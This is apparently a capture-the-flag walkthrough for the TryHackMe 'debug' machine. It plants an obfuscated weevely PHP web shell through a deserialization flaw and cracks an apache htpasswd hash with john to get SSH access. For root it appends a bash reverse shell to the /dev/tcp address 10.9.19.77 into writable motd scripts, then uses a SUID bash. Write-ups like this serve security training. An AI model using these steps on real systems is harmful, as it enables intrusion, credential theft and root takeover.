There is a big, obvious deserialization vulnearability.
Generate a php web shell.
1 2
$ weevely generate -obfuscator cleartext1_php noraj agent.php Generated 'agent.php' with password 'noraj' of 478 byte size.
My deserialization payload will override the class variables: I want a php file instead of a text file,
and I'll fix the message content to my webshell.
With cat .htpasswd we can find a user hash for apache: james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1.
It may be worth to crack if it is re-used for SSH.
1 2 3 4 5 6 7 8 9
$ john --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=md5crypt-long hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status j<edited>a (james) 1g 0:00:00:00 DONE (2021-07-27 16:59) 50.00g/s 32000p/s 32000c/s 32000C/s evelyn..pebbles Use the "--show" option to display all of the cracked passwords reliably Session completed
$ ssh james@debug.thm The authenticity of host 'debug.thm (10.10.146.9)' can't be established. ED25519 key fingerprint is SHA256:j1rsa6H3aWAH+1ivgTwsdNPBDEJU72p3MUWbcL70JII. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'debug.thm' (ED25519) to the list of known hosts. james@debug.thm's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)
439 packages can be updated. 380 updates are security updates.
Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44 james@osboxes:~$ id uid=1001(james) gid=1001(james) groups=1001(james) james@osboxes:~$ cat user.txt
As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it?
But there's still one thing I'd like you to do, before the submission.
Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D
I gave you access to modify all these files :)
Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!
Best Regards,
root
We have the permission for all motd files:
1 2 3 4 5 6 7 8 9 10
james@osboxes:~$ ls -lhA /etc/update-motd.d/ total 28K -rwxrwxr-x 1 root james 1.2K Mar 10 18:32 00-header -rwxrwxr-x 1 root james 0 Mar 10 18:38 00-header.save -rwxrwxr-x 1 root james 1.2K Jun 14 2016 10-help-text -rwxrwxr-x 1 root james 97 Dec 7 2018 90-updates-available -rwxrwxr-x 1 root james 299 Jul 22 2016 91-release-upgrade -rwxrwxr-x 1 root james 142 Dec 7 2018 98-fsck-at-reboot -rwxrwxr-x 1 root james 144 Dec 7 2018 98-reboot-required -rwxrwxr-x 1 root james 604 Nov 5 2017 99-esm
We can append a reverse shell (/bin/bash -i >& /dev/tcp/10.9.19.77/9001 0>&1) to any of thus file (eg. 00-header)
and when any user will connect it will be executed with root permission.
It wasn't working with reverse shells so I made a BASH SUID instead.